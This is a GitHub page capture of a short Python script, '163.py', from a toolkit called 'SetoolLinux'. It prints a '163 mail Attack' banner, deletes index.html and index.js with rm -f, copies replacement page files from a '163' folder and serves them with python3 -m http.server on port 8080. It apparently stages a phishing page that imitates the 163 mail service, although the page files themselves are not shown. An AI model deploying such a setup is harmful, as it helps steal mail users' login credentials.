-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy path163.py
28 lines (26 loc) · 766 Bytes
/
163.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#use 163 mail attack
#use python
#authet:windows observer
def logo():
print("")
print("===================================")
print("SetoolLinux-->Set-->163 mail Attack")
print("===================================")
print("")
logo()
from cgi import print_arguments
import os
os.system("rm -f index.html")
os.system("rm -f index.js")
#to delete the file form the content
#but you don't run the software that will be lose the setoollinux 's file
os.system("cp 163/index.html ./")
os.system("cp 163/index.js ./")
#finish the file optioning
print("finish the file : index.html")
print("finish the file : index.js")
print("finish the file : setoollin.py")
print("finish the file : set.py")
print("")
import os
os.system("python3 -m http.server 8080")